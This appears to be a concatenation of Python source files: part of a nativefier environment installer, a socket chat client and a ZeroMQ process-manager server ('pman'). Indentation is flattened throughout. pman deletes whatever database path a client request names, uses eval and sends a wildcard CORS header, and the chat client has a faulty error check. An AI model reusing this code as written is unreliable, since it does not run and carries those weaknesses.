self.logger.warning("'url' not found in nativefier environment settings. Using hardcoded URL '{}'".format(NATIVEFIER_BASE_URL))
base_url = NATIVEFIER_BASE_URL
url = base_url.format(version=nativefier_settings['version'])
return EnvironmentComponent(name='nativefier@{}'.format(nativefier_settings['version']),
url=url,
size=self.http_client.get_content_length(url),
version=nativefier_settings['version'],
id='nativefier')
def check_environment(self, env: dict, local_config: dict, app: WebApplication,
is_x86_x64_arch: bool, widevine: bool) -> List[EnvironmentComponent]:
"""
:param app:
:param is_x86_x64_arch:
:return: the environment settings
"""
components, check_threads = [], []
system_env = local_config['environment'].get('system', False)
if system_env:
self.logger.warning("Using system's nativefier to install {}".format(app.url))
else:
node_check = Thread(target=self._check_and_fill_node, args=(env, components))
node_check.start()
check_threads.append(node_check)
elec_check = Thread(target=self._check_and_fill_electron, args=(app, env, local_config, is_x86_x64_arch, widevine, components))
elec_check.start()
check_threads.append(elec_check)
for t in check_threads:
t.join()
return components
def update(self, components: List[EnvironmentComponent], handler: ProcessHandler) -> bool:
self.logger.info('Updating environment')
Path(ENV_PATH).mkdir(parents=True, exist_ok=True)
comp_map = {c.id: c for c in components}
node_data = comp_map.get('nodejs')
nativefier_data = comp_map.get('nativefier')
if node_data:
if not self._download_and_install(version=node_data.version, version_url=node_data.url, watcher=handler.watcher):
return False
if not self._install_nativefier(version=nativefier_data.version, url=nativefier_data.url, handler=handler):
return False
else:
if nativefier_data and not self._install_nativefier(version=nativefier_data.version, url=nativefier_data.url, handler=handler):
return False
electron_data = comp_map.get('electron')
if electron_data:
if not self.download_electron(version=electron_data.version, url=electron_data.url, watcher=handler.watcher, widevine=electron_data.properties['widevine']):
return False
sha256_data = comp_map.get('electron_sha256')
if sha256_data:
if not self.download_electron_sha256(version=sha256_data.version, url=sha256_data.url, watcher=handler.watcher, widevine=sha256_data.properties['widevine']):
return False
self.logger.info('Environment successfully updated')
return True
|
chat.py | import socket
import select
import errno
import sys
import os
import threading
import time
# below is the client of chat.
HEADER_LENGTH = 10
IP = "127.0.0.1"
PORT = 1234
console_line_content = []
my_username = input("Username: ")
console_line_content.append("Name: " + my_username + ", Here is my chat console.")
os.system('clear')
for line in console_line_content:
print(line)
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((IP, PORT))
client_socket.setblocking(False)
username = my_username.encode("utf-8")
username_header = f"{len(username):<{HEADER_LENGTH}}".encode("utf-8")
client_socket.send(username_header + username)
def receive_thing():
while True:
try:
username_header = client_socket.recv(HEADER_LENGTH)
if not len(username_header):
print("connection closed by the server")
sys.exit()
username_length = int(username_header.decode("utf-8").strip())
username = client_socket.recv(username_length).decode("utf-8")
message_header = client_socket.recv(HEADER_LENGTH)
message_length = int(message_header.decode("utf-8").strip())
message = client_socket.recv(message_length).decode("utf-8")
content_show = f"{username} >>> {message}"
print('', end='\r')
print(content_show, end='\r\n')
except IOError as e:
if e.errno != errno.EAGAIN or e.errno != errno.EWOULDBLOCK:
print('reading error', str(e))
sys.exit()
else:
# check the server information every 1 second.
time.sleep(1)
except Exception as e:
print("General error", str(e))
#sys.exit()
threading.Thread(target=receive_thing).start()
while True:
message = input(my_username + " > ")
if message:
message = message.encode("utf-8")
message_header = f"{len(message) :< {HEADER_LENGTH}}".encode("utf-8")
client_socket.send(message_header + message)
#print(f"{my_username} > {message}" + " (sended) ")
|
pman.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import abc
import time
import os
import threading
import zmq
from webob import Response
import psutil
import queue
from functools import partial
import platform
import multiprocessing
import inspect
import json
import ast
import shutil
import datetime
import socket
import uuid
import pfmisc
# pman local dependencies
try:
from .openshiftmgr import *
except:
from openshiftmgr import *
try:
from .crunner import *
except:
from crunner import *
from pfmisc.Auth import Auth
from pfmisc.C_snode import *
from pfmisc._colors import Colors
import docker
import pudb
import pprint
from kubernetes.client.rest import ApiException
str_devNotes = """
08 June 2017
* NOTE: The zmq socket *always* sends back HTTP formatted headers around
the response string. The listening object (usually pfurl) should
*NOT* parse this with --httpResponseBodyParse!
10 May 2017
* Should methods in the listener be functors? Certain methods, such as
'run' and 'status' need specialized implementations based on a run
environment. This run environment is not known by the listener when
it starts, but can be specified at payload parsing by the process()
method. This, a method such as
t_run_process()
might need at arbitrary call time to be specialized to some external
condition set (say by running as a container). Naively, this can be
parsed in the message and thread redirected to
t_run_process_swarm()
for example.
Would a functor type approach be useful at all?
"""
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stopper = threading.Event()
def stopit(self):
self._stopper.set()
def stopped(self):
return self._stopper.isSet()
class pman(object):
"""
The server class for the pman (process manager) server
"""
__metaclass__ = abc.ABCMeta
def col2_print(self, str_left, str_right, level = 1):
self.dp.qprint(Colors.WHITE +
('%*s' % (self.LC, str_left)),
end = '',
level = level,
syslog = False)
self.dp.qprint(Colors.CYAN +
('%*s' % (self.RC, str_right)) + Colors.NO_COLOUR,
level = level,
syslog = False)
def __init__(self, **kwargs):
"""
Constructor
"""
self.within = None # An encapsulating object
# Description
self.str_desc = ""
self.str_name = ""
self.str_version = ""
self.__name__ = 'pman'
# The main server function
self.threaded_server = None
# The listener thread array -- each element of this array is threaded listener
# object
self.l_listener = []
self.listenerSleep = 0.1
# The fileIO threaded object
self.fileIO = None
# DB
self.b_clearDB = False
self.str_DBpath = '/tmp/pman'
self.ptree = C_stree()
self.str_fileio = 'json'
self.DBsavePeriod = 60
# Comms
self.str_protocol = "tcp"
self.str_IP = "127.0.0.1"
self.str_port = "5010"
self.router_raw = 0
self.listeners = 1
self.b_http = False
self.socket_front = None
self.socket_back = None
# Job info
self.auid = ''
self.jid = ''
self.container_env = ''
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.pp = pprint.PrettyPrinter(indent=4)
self.verbosity = 1
# Authentication parameters
self.b_tokenAuth = False
self.authModule = None
for key,val in kwargs.items():
if key == 'protocol': self.str_protocol = val
if key == 'IP': self.str_IP = val
if key == 'port': self.str_port = val
if key == 'raw': self.router_raw = int(val)
if key == 'listeners': self.listeners = int(val)
if key == 'listenerSleep': self.listenerSleep = float(val)
if key == 'DBsavePeriod': self.DBsavePeriod = int(val)
if key == 'http': self.b_http = int(val)
if key == 'within': self.within = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
if key == 'DBpath': self.str_DBpath = val
if key == 'clearDB': self.b_clearDB = val
if key == 'desc': self.str_desc = val
if key == 'name': self.str_name = val
if key == 'version': self.str_version = val
if key == 'containerEnv': self.container_env = val.lower()
if key == 'verbosity': self.verbosity = int(val)
if key == 'b_tokenAuth': self.b_tokenAuth = val
if key == 'str_tokenPath':
if self.b_tokenAuth:
self.authModule = Auth('socket', val)
# Screen formatting
self.LC = 30
self.RC = 40
self.dp = pfmisc.debug(
verbosity = self.verbosity,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile,
within = self.__name__)
if self.b_clearDB and os.path.isdir(self.str_DBpath):
shutil.rmtree(self.str_DBpath)
self.dp.qprint(self.str_desc, level = 1)
self.col2_print('Server is listening on',
'%s://%s:%s' % (self.str_protocol, self.str_IP, self.str_port))
self.col2_print('Router raw mode', str(self.router_raw))
self.col2_print('HTTP response back mode', str(self.b_http))
self.col2_print('listener sleep', str(self.listenerSleep))
# Create the main internal DB data structure/abstraction
self.ptree = C_stree()
# Read the DB from HDD
self.DB_fileIO(cmd = 'load')
# Setup zmq context
self.zmq_context = zmq.Context()
def DB_read(self, **kwargs):
"""
Read the DB from filesystem. If DB does not exist on filesystem,
create an empty DB and save to filesystem.
"""
if os.path.isdir(self.str_DBpath):
self.dp.qprint("Reading pman DB from disk...\n")
self.ptree = C_stree.tree_load(
pathDiskRoot = self.str_DBpath,
loadJSON = True,
loadPickle = False)
self.dp.qprint("pman DB read from disk...\n")
self.col2_print('Reading pman DB from disk:', 'OK')
else:
P = self.ptree
# P.cd('/')
# P.mkdir('proc')
P.tree_save(
startPath = '/',
pathDiskRoot = self.str_DBpath,
failOnDirExist = False,
saveJSON = True,
savePickle = False
)
self.col2_print('Reading pman DB from disk:',
'No DB found... creating empty default DB')
self.dp.qprint(Colors.NO_COLOUR, end='')
def DB_fileIO(self, **kwargs):
"""
Process DB file IO requests. Typically these control the
DB -- save or load.
"""
str_cmd = 'save'
str_DBpath = self.str_DBpath
tree_DB = self.ptree
def loadFromDiskAsJSON():
tree_DB = C_stree.tree_load(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
loadJSON = True,
loadPickle = False)
return tree_DB
def loadFromDiskAsPickle():
tree_DB = C_stree.tree_load(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
loadJSON = False,
loadPickle = True)
return tree_DB
def saveToDiskAsJSON(tree_DB):
tree_DB.tree_save(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
saveJSON = True,
savePickle = False)
def saveToDiskAsPickle(tree_DB):
tree_DB.tree_save(
startPath = '/',
pathDiskRoot = str_DBpath,
failOnDirExist = False,
saveJSON = False,
savePickle = True)
for k,v in kwargs.items():
if k == 'cmd': str_cmd = v
if k == 'fileio': self.str_fileio = v
if k == 'dbpath': str_DBpath = v
if k == 'db': tree_DB = v
# self.dp.qprint('cmd = %s' % str_cmd)
# self.dp.qprint('fileio = %s' % self.str_fileio)
# self.dp.qprint('dbpath = %s' % str_DBpath)
if str_cmd == 'clear':
# This wipes the existing DB both in memory
# and in disk storage.
self.dp.qprint('Clearing internal memory DB...')
tree_DB = C_stree()
self.dp.qprint('Removing DB from persistent storage...')
if os.path.isdir(str_DBpath):
shutil.rmtree(str_DBpath, ignore_errors=True)
self.dp.qprint('Saving empty DB to peristent storage')
saveToDiskAsJSON(tree_DB)
if str_cmd == 'save':
if os.path.isdir(str_DBpath):
shutil.rmtree(str_DBpath, ignore_errors=True)
#print(tree_DB)
if self.str_fileio == 'json': saveToDiskAsJSON(tree_DB)
if self.str_fileio == 'pickle': saveToDiskAsPickle(tree_DB)
if str_cmd == 'load':
if os.path.isdir(str_DBpath):
self.dp.qprint("Reading pman DB from disk...\n")
if self.str_fileio == 'json': tree_DB = loadFromDiskAsJSON()
if self.str_fileio == 'pickle': tree_DB = loadFromDiskAsPickle()
self.dp.qprint("Pre-existing DB found at %s..." % str_DBpath)
self.ptree = tree_DB
self.ptree.cd('/')
self.dp.qprint('DB root nodes:\n%s' % self.ptree.str_lsnode())
else:
saveToDiskAsJSON(tree_DB)
self.col2_print('Reading pman DB from disk:',
'No DB found... creating empty default DB')
self.dp.qprint(Colors.NO_COLOUR, end='')
self.ptree = tree_DB
def thread_serve(self):
"""
Serve the 'start' method in a thread.
:return:
"""
self.threaded_server = StoppableThread(target=self.start)
self.threaded_server.start()
while not self.threaded_server.stopped():
time.sleep(1)
# Stop the listeners...
self.dp.qprint("setting b_stopThread on all listeners...")
for i in range(0, self.listeners):
self.dp.qprint("b_stopThread on listener %d and executing join()..." % i)
self.l_listener[i].b_stopThread = True
self.l_listener[i].join()
# Stop the fileIO
self.fileIO.b_stopThread = True
self.dp.qprint("b_stopThread on fileIO executing join()...")
self.fileIO.join()
self.dp.qprint("Shutting down the zmq infrastructure...")
try:
self.dp.qprint('calling self.socket_back.close()')
self.socket_back.close()
except:
self.dp.qprint('Caught exception in closing back socket')
try:
self.dp.qprint('calling self.socket_front.close()')
self.socket_front.close()
except zmq.error.ZMQError:
self.dp.qprint('Caught exception in closing front socket...')
self.dp.qprint('calling zmq_context.term()')
# self.zmq_context.term()
self.dp.qprint("calling join() on all this thread...")
self.threaded_server.join()
self.dp.qprint("shutdown successful...")
def start(self):
"""
Main execution.
* Instantiate several 'listener' worker threads
** 'listener' threads are used to process input from external
processes. In turn, 'listener' threads can thread out
'crunner' threads that actually "run" the job.
* Instantiate a job poller thread
** 'poller' examines the internal DB entries and regularly
queries the system process table, tracking if jobs
are still running.
"""
self.dp.qprint('Starting %d Listener threads' % self.listeners)
# Front facing socket to accept client connections.
self.socket_front = self.zmq_context.socket(zmq.ROUTER)
self.socket_front.router_raw = self.router_raw
self.socket_front.setsockopt(zmq.LINGER, 1)
self.socket_front.bind('%s://%s:%s' % (self.str_protocol,
self.str_IP,
self.str_port)
)
# Backend socket to distribute work.
self.socket_back = self.zmq_context.socket(zmq.DEALER)
self.socket_back.setsockopt(zmq.LINGER, 1)
self.socket_back.bind('inproc://backend')
# Start the 'fileIO' thread
self.fileIO = FileIO( DB = self.ptree,
timeout = self.DBsavePeriod,
within = self,
debugFile = self.str_debugFile,
verbosity = self.verbosity,
debugToFile = self.b_debugToFile)
self.fileIO.start()
# Start the 'listener' workers... keep track of each
# listener instance so that we can selectively stop
# them later.
for i in range(0, self.listeners):
self.l_listener.append(Listener(
id = i,
context = self.zmq_context,
DB = self.ptree,
DBpath = self.str_DBpath,
http = self.b_http,
containerEnv = self.container_env,
within = self,
listenerSleep = self.listenerSleep,
verbosity = self.verbosity,
debugToFile = self.b_debugToFile,
debugFile = self.str_debugFile,
b_tokenAuth = self.b_tokenAuth,
authModule = self.authModule))
self.l_listener[i].start()
# Use built in queue device to distribute requests among workers.
# What queue device does internally is,
# 1. Read a client's socket ID and request.
# 2. Send socket ID and request to a worker.
# 3. Read a client's socket ID and result from a worker.
# 4. Route result back to the client using socket ID.
self.dp.qprint("*******before zmq.device!!!")
try:
zmq.device(zmq.QUEUE, self.socket_front, self.socket_back)
except:
self.dp.qprint('Hmmm... some error was caught on shutting down the zmq.device...')
self.dp.qprint("*******after zmq.device!!!")
def __iter__(self):
yield('Feed', dict(self.ptree.snode_root))
# @abc.abstractmethod
# def create(self, **kwargs):
# """Create a new tree
#
# """
def __str__(self):
"""Print
"""
return str(self.ptree.snode_root)
@property
def stree(self):
"""STree Getter"""
return self.ptree
@stree.setter
def stree(self, value):
"""STree Getter"""
self.ptree = value
class FileIO(threading.Thread):
"""
A class that periodically saves the database from memory out to disk.
"""
def __init__(self, **kwargs):
self.__name = "FileIO"
self.b_http = False
self.str_DBpath = "/tmp/pman"
self.timeout = 60
self.within = None
self.b_stopThread = False
self.verbosity = 1
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.pp = pprint.PrettyPrinter(indent=4)
for key,val in kwargs.items():
if key == 'DB': self.ptree = val
if key == 'DBpath': self.str_DBpath = val
if key == 'timeout': self.timeout = val
if key == 'within': self.within = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
if key == 'verbosity': self.verbosity = int(val)
self.dp = pfmisc.debug(
verbosity = self.verbosity,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile,
within = self.__name)
threading.Thread.__init__(self)
def run(self):
""" Main execution. """
# Socket to communicate with front facing server.
while not self.b_stopThread:
# self.dp.qprint('Saving DB as type "%s" to "%s"...' % (
# self.within.str_fileio,
# self.within.str_DBpath
# ))
self.within.DB_fileIO(cmd = 'save')
# self.dp.qprint('DB saved...')
for second in range(0, self.timeout):
if not self.b_stopThread:
time.sleep(1)
else:
break
self.dp.qprint('returning from FileIO run method...')
# raise ValueError('FileIO thread terminated.')
class Listener(threading.Thread):
""" Listeners accept communication requests from front facing server.
Parse input text streams and act accordingly. """
def __init__(self, **kwargs):
self.__name = "Listener"
self.b_http = False
self.poller = None
self.str_DBpath = "/tmp/pman"
self.str_jobRootDir = ''
self.listenerSleep = 0.1
self.verbosity = 1
self.jid = ''
self.auid = ''
self.within = None
self.b_stopThread = False
self.openshiftmgr = None
# Debug parameters
self.str_debugFile = '/dev/null'
self.b_debugToFile = True
self.pp = pprint.PrettyPrinter(indent=4)
for key,val in kwargs.items():
if key == 'context': self.zmq_context = val
if key == 'listenerSleep': self.listenerSleep = float(val)
if key == 'id': self.worker_id = val
# if key == 'DB': self.ptree = val
if key == 'DBpath': self.str_DBpath = val
if key == 'http': self.b_http = val
if key == 'within': self.within = val
if key == 'debugFile': self.str_debugFile = val
if key == 'debugToFile': self.b_debugToFile = val
if key == 'containerEnv': self.container_env = val
if key == 'verbosity': self.verbosity = int(val)
if key == 'b_tokenAuth': self.b_tokenAuth = val
if key == 'authModule': self.authModule = val
self.dp = pfmisc.debug(
verbosity = self.verbosity,
debugFile = self.str_debugFile,
debugToFile = self.b_debugToFile,
within = self.__name)
threading.Thread.__init__(self)
# logging.debug('leaving __init__')
def df_print(self, adict):
"""
Return a nicely formatted string representation of a dictionary
"""
return self.pp.pformat(adict).strip()
def run(self):
""" Main execution. """
# Socket to communicate with front facing server.
self.dp.qprint('starting...')
socket = self.zmq_context.socket(zmq.DEALER)
socket.connect('inproc://backend')
b_requestWaiting = False
resultFromProcessing = False
request = ""
client_id = -1
self.dp.qprint(Colors.BROWN + "Listener ID - %s: run() - Ready to serve..." % self.worker_id, level = 1)
while not self.b_stopThread:
# wait (non blocking) for input on socket
try:
client_id, request = socket.recv_multipart(flags = zmq.NOBLOCK)
self.dp.qprint('Received %s from client_id: %s' % (request, client_id))
b_requestWaiting = True
except zmq.Again as e:
if self.listenerSleep:
time.sleep(0.1)
else:
pass
if b_requestWaiting:
self.dp.qprint(Colors.BROWN + 'Listener ID - %s: run() - Received comms from client.' % (self.worker_id))
self.dp.qprint(Colors.BROWN + 'Client sends: %s' % (request))
resultFromProcessing = self.process(request)
if resultFromProcessing:
self.dp.qprint(Colors.BROWN + 'Listener ID - %s: run() - Sending response to client.' %
(self.worker_id))
self.dp.qprint('JSON formatted response:')
str_payload = json.dumps(resultFromProcessing, sort_keys=False, indent=4)
self.dp.qprint(Colors.LIGHT_CYAN + str_payload)
self.dp.qprint(Colors.BROWN + 'len = %d chars' % len(str_payload))
socket.send(client_id, zmq.SNDMORE)
if self.b_http:
str_contentType = "application/html"
res = Response(str_payload)
res.content_type = str_contentType
str_HTTPpre = "HTTP/1.1 "
str_res = "%s%s" % (str_HTTPpre, str(res))
str_res = str_res.replace("UTF-8", "UTF-8\nAccess-Control-Allow-Origin: *")
self.dp.qprint('HTML response')
self.dp.qprint(str_res.encode())
socket.send(str_res.encode())
else:
str_contentType = "application/json"
res = Response(str_payload)
res.content_type = str_contentType
str_HTTPpre = "HTTP/1.1 "
str_res = '%s%s' % (str_HTTPpre, (res))
self.dp.qprint(str_res)
socket.send_string(str_res)
b_requestWaiting = False
self.dp.qprint('Listener ID - %s: Returning from run()...' % self.worker_id)
# raise('Listener ID - %s: Thread terminated' % self.worker_id)
return True
def t_search_process(self, *args, **kwargs):
"""
Search
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In search process...")
d_request = {}
d_ret = {}
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
b_pathSpec = False
str_path = ""
if 'path' in d_meta:
b_pathSpec = True
str_path = d_meta['path']
b_jobSpec = False
str_jobSpec = ""
if 'job' in d_meta:
b_jobSpec = True
str_jobSpec = d_meta['job']
b_fieldSpec = False
str_fieldSpec = ""
if 'field' in d_meta:
b_fieldSpec = True
str_fieldSpec = d_meta['field']
b_whenSpec = False
str_whenSpec = "end"
if 'when' in d_meta:
b_whenSpec = True
str_whenSpec = d_meta['when']
self.dp.qprint(d_meta)
self.dp.qprint(b_pathSpec)
str_fileName = d_meta['key']
str_target = d_meta['value']
p = self.within.ptree
str_origDir = p.cwd()
str_pathOrig = str_path
for r in self.within.ptree.lstr_lsnode('/'):
if p.cd('/' + r)['status']:
str_val = p.cat(str_fileName)
if str_val == str_target:
if not b_pathSpec:
str_path = '/api/v1/' + r + '/' + str_fileName
else:
str_path = '/api/v1/' + r + str_pathOrig
if str_path[-1] == '/': str_path = str_path[:-1]
if b_jobSpec:
str_path = '/api/v1/' + r + '/' + \
str_whenSpec + '/' + \
str_jobSpec + '/' + \
'%sInfo' % str_whenSpec + '/' + \
str_jobSpec + '/' + \
str_fieldSpec
d_ret[str(hits)] = {}
d_ret[str(hits)] = self.DB_get(path = str_path)
hits += 1
p.cd(str_origDir)
return {"d_ret": d_ret,
"status": bool(hits)}
def t_info_process(self, *args, **kwargs):
"""
Check if the job corresponding to the search pattern is "done".
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In info process...")
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_search = self.t_search_process(request = d_request)['d_ret']
p = self.within.ptree
for j in d_search.keys():
d_j = d_search[j]
for job in d_j.keys():
str_pathStart = '/api/v1/' + job + '/startInfo'
str_pathEnd = '/api/v1/' + job + '/endInfo'
d_ret[str(hits)+'.0'] = {}
d_ret[str(hits)+'.0'] = self.DB_get(path = str_pathStart)
d_ret[str(hits)+'.1'] = {}
d_ret[str(hits)+'.1'] = self.DB_get(path = str_pathEnd)
hits += 1
if not hits:
d_ret = {
"-1": {
"noJobFound": {
"endInfo": {"allJobsDone": None}
}
}
}
else:
b_status = True
return {"d_ret": d_ret,
"status": b_status}
def t_quit_process(self, *args, **kwargs):
"""
Process the 'quit' POST directive. This might appear counter-intuitive
at first glance since the 'get' is the result of a REST POST, but is
logically consistent within the semantics of this system.
"""
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if 'saveDB' in d_meta.keys():
self.dp.qprint("Saving DB...")
self.within.DB_fileIO(cmd = 'save')
self.dp.qprint('calling threaded_server.stop()')
self.within.threaded_server.stopit()
self.dp.qprint('called threaded_server.stop()')
return {'d_ret': d_ret,
'status': True}
def t_get_process(self, *args, **kwargs):
"""
Process the 'get' POST directive. This might appear counter-intuitive
at first glance since the 'get' is the result of a REST POST, but is
logically consistent within the semantics of this system.
"""
d_request = {}
d_ret = {}
b_status = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
str_path = '/api/v1' + d_meta['path']
d_ret = self.DB_get(path = str_path)
return {'d_ret': d_ret,
'status': True}
def t_DBctl_process(self, *args, **kwargs):
"""
Entry point for internal DB control processing.
"""
tree_DB = self.within.ptree
d_request = {}
d_ret = {}
b_status = False
str_fileio = self.within.str_fileio
str_DBpath = self.within.str_DBpath
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
if 'do' in d_meta: str_do = d_meta['do']
if 'dbpath' in d_meta: str_DBpath = d_meta['dbpath']
if 'fileio' in d_meta: str_fileio = d_meta['fileio']
self.within.DB_fileIO(
cmd = str_do,
fileio = str_fileio,
dbpath = str_DBpath,
db = tree_DB
)
# str_path = '/api/v1' + str_DBpath
d_ret = self.DB_get(path = str_DBpath)
return {'d_ret': d_ret,
'status': True}
def t_fileiosetup_process(self, *args, **kwargs):
"""
Setup a thread with a socket listener. Return listener address to client
"""
self.dp.qprint("In fileiosetup process...")
d_ret = {}
for k, v in kwargs.items():
if k == 'request': d_request = v
d_meta = d_request['meta']
d_ret['fileioIP'] = "%s" % self.within.str_IP
d_ret['fileioport'] = "%s" % (int(self.within.str_port) + self.worker_id)
d_ret['serveforever']=d_meta['serveforever']
d_args = {
'ip': d_ret['fileioIP'],
'port': d_ret['fileioport']
}
server = ThreadedHTTPServer((d_args['ip'], int(d_args['port'])), StoreHandler)
server.setup(args = d_args)
self.dp.qprint("serveforever = %d" % d_meta['serveforever'])
b_serveforever = False
if 'serveforever' in d_meta.keys():
b_serveforever = d_meta['serveforever']
if b_serveforever:
self.dp.qprint("about to serve_forever()...")
server.serve_forever()
else:
self.dp.qprint("about to handle_request()...")
server.handle_request()
return {"d_ret": d_ret,
"status": True}
def job_state(self, *args, **kwargs):
"""
Return a structure that can be further processed to determine the job's state.
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In job_state()...")
d_request = {}
d_ret = {}
b_status = False
b_container = False
hits = 0
for k, v in kwargs.items():
if k == 'request': d_request = v
d_search = self.t_search_process(request = d_request)['d_ret']
p = self.within.ptree
Ts = C_stree()
Te = C_stree()
for j in d_search.keys():
d_j = d_search[j]
for job in d_j.keys():
str_pathStart = '/api/v1/' + job + '/start'
str_pathEnd = '/api/v1/' + job + '/end'
d_start = self.DB_get(path = str_pathStart)
d_end = self.DB_get(path = str_pathEnd)
Ts.initFromDict(d_start)
Te.initFromDict(d_end)
self.dp.qprint("Ts.cwd = %s " % Ts.cwd())
self.dp.qprint(Ts)
self.dp.qprint("Te.cwd = %s " % Te.cwd())
self.dp.qprint(Te)
l_subJobsStart = []
if Ts.cd('/%s/start' % job)['status']:
l_subJobsStart = Ts.lstr_lsnode()
l_subJobsStart = list(map(int, l_subJobsStart))
l_subJobsStart.sort()
self.dp.qprint("l_subJobsStart (pre) = %s" % l_subJobsStart)
if len(l_subJobsStart) > 1: l_subJobsStart = l_subJobsStart[:-1]
l_subJobsEnd = []
if Te.cd('/%s/end' % job)['status']:
l_subJobsEnd = Te.lstr_lsnode()
l_subJobsEnd = list(map(int, l_subJobsEnd))
l_subJobsEnd.sort()
self.dp.qprint("l_subJobsEnd (pre) = %s " % l_subJobsEnd)
if len(l_subJobsEnd) > 1: l_subJobsEnd = l_subJobsEnd[:-1]
self.dp.qprint("l_subJobsStart (post) = %s" % l_subJobsStart)
self.dp.qprint("l_subJobsEnd (post) = %s" % l_subJobsEnd)
for j in l_subJobsStart:
l_subJobsStart[j] = Ts.cat('/%s/start/%d/startInfo/%d/startTrigger' % \
(job, j, j))
# jobsEnd behaviour can be slightly different to the jobStart, particularly if
# the job being executed is killed -- sometimes recording the "death" event of
# the job does not happen and the job indexing ends up missing several epochs:
#
# l_subJobsStart (pre) = [0, 1, 2, 3, 4]
# l_subJobsEnd (pre) = [0, 1, 3, 4]
#
# to assure correct returncode lookup, we always parse the latest job epoch.
latestJob = 0
if len(l_subJobsEnd):
latestJob = l_subJobsEnd[-1]
for j in list(range(0, latestJob+1)):
l_subJobsEnd[j] = Te.cat('/%s/end/%s/endInfo/%d/returncode' % (job, latestJob, j))
T_container = False
if p.exists('container', path = '/%s' % job):
T_container = C_stree()
p.copy(startPath = '/%s/container' % (job), destination = T_container)
d_ret[str(hits)+'.container'] = {"jobRoot": job, "tree": dict(T_container.snode_root)}
else:
d_ret[str(hits)+'.container'] = {"jobRoot": job, "tree": None}
d_ret[str(hits)+'.start'] = {"jobRoot": job, "startTrigger": l_subJobsStart}
d_ret[str(hits)+'.end'] = {"jobRoot": job, "returncode": l_subJobsEnd}
hits += 1
if not hits:
d_ret['-1.start'] = {"jobRoot": None, "startTrigger": None}
d_ret['-1.end'] = {"jobRoot": None, "returncode": None}
d_ret['-1.container'] = {"jobRoot": None, "tree": None}
else:
b_status = True
return {"hits": hits,
"d_ret": d_ret,
"status": b_status}
def t_done_process(self, *args, **kwargs):
"""
Check if the job corresponding to the search pattern is "done".
:param args:
:param kwargs:
:return:
"""
self.dp.qprint("In done process...")
return self.job_state(*args, **kwargs)
def t_status_process(self, *args, **kwargs):
"""
This method is the main (threaded) entry point for returning
information on the status of jobs (both active and historical)
that have been (or are currently) managed by pman.
Originally, the concept of "job" only extended to a command
line process spawned off on the underlying shell. With time,
however, this concept expanded to encompass processes that
are containerized.
While most (if not all) of the use of pman currently is to
handle containerized compute, the status determination logic
still retains the ability to query simple spawned jobs.
The determination about whether or not a job has been
containerized is quite simple -- a token in the internal
job "state" memory structure (the main pman stree "DB")
is checked -- this initial chunk of data is returned by a
call to self.job_state() which delivers a dictionary
representation of the jobRoot in the DB tree.
:param args:
:param kwargs:
:return: dictionary of components defining job state.
"""
self.dp.qprint("------- In status process ------------")
status = logs = currentState = ''
if self.container_env == 'openshift':
self.dp.qprint('------- Processing openshift status request -----------')
try:
d_containerStatus = self.t_status_process_openshift(*args, **kwargs)
status = d_containerStatus['status']
logs = d_containerStatus['logs']
currentState = d_containerStatus['currentState']
except Exception as e:
if isinstance(e, ApiException) and e.reason == 'Not Found':
status = logs = currentState = e.reason
else:
raise e
d_ret = {
'description': str(status),
'l_logs': str(logs),
'l_status': currentState
}
return {
"d_ret": d_ret,
"status": str(currentState)
}
else:
d_state = self.job_state(*args, **kwargs)
# {
# "hits": hits,
# "d_ret":
# [<index>+'.container'] = {
# "jobRoot": job, "tree": dict(T_container.snode_root)
# },
# "status": b_status
# }
d_ret = d_state['d_ret']
b_status = d_state['status']
d_keys = d_ret.items()
l_status = []
l_logs = []
#
# The d_ret keys consist of groups of
#
# *.start
# *.end
# *.container
#
# thus the loop grouping is number of items / 3
#
if '0.start' in d_ret:
for i in range(0, int(len(d_keys)/3)):
try:
b_startEvent = d_ret['%s.start' % str(i)]['startTrigger'][0]
except:
b_startEvent = False
try:
endcode = d_ret['%s.end' % str(i)]['returncode'][0]
except:
endcode = None
# Was this a containerized job?
found_container = False
container_path = '%s.%s' % (str(i), 'container')
if container_path in d_state['d_ret'] and \
d_state['d_ret'][container_path]['tree'] and \
b_startEvent:
kwargs['d_state'] = d_state
kwargs['hitIndex'] = str(i)
str_methodSuffix = None
if self.container_env == 'swarm':
# append suffix _container to redirect to container function
str_methodSuffix = 'container'
d_containerStatus = eval("self.t_status_process_%s(*args, **kwargs)" % str_methodSuffix)
# d_ret {
# 'status': d_ret['status'], # bool
# 'logs': str_logs, # logs from app in container
# 'currentState': d_ret['d_process']['state'] # string of 'finishedSuccessfully' etc
# }
l_status.append(d_containerStatus['currentState'])
l_logs.append(d_containerStatus['logs'])
found_container = True
# The case for non-containerized jobs
if not found_container:
if endcode is None and not b_startEvent:
l_status.append('notstarted')
if endcode is None and b_startEvent:
l_status.append('started')
if not endcode and b_startEvent and type(endcode) is int:
l_status.append('finishedSuccessfully')
if endcode and b_startEvent:
l_status.append('finishedWithError')
self.dp.qprint('b_startEvent = %d' % b_startEvent)
self.dp.qprint(endcode)
self.dp.qprint('l_status = %s' % l_status)
